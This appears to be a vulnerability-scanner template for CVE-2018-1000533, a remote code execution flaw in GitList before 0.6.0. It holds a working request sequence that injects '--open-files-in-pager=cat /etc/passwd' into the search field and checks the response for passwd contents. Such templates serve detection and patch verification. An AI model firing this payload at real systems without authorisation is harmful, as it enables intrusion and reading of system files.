id: CVE-2018-1000533

info:
  name: GitList < 0.6.0 RCE
  author: pikpikcu
  severity: critical
  description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user.
  reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
  tags: rce,git,cve,cve2018,gitlist
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2018-1000533
    cwe-id: CWE-20

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /{{path}}/tree/a/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        query=--open-files-in-pager=cat%20/etc/passwd

    extractors:
      - type: regex
        name: path
        group: 1
        internal: true
        part: body
        regex:
          - '<span class="name">(.*?)</span>'

    matchers:
      - type: word
        words:
          - "root:/root:/bin/bash"
        part: body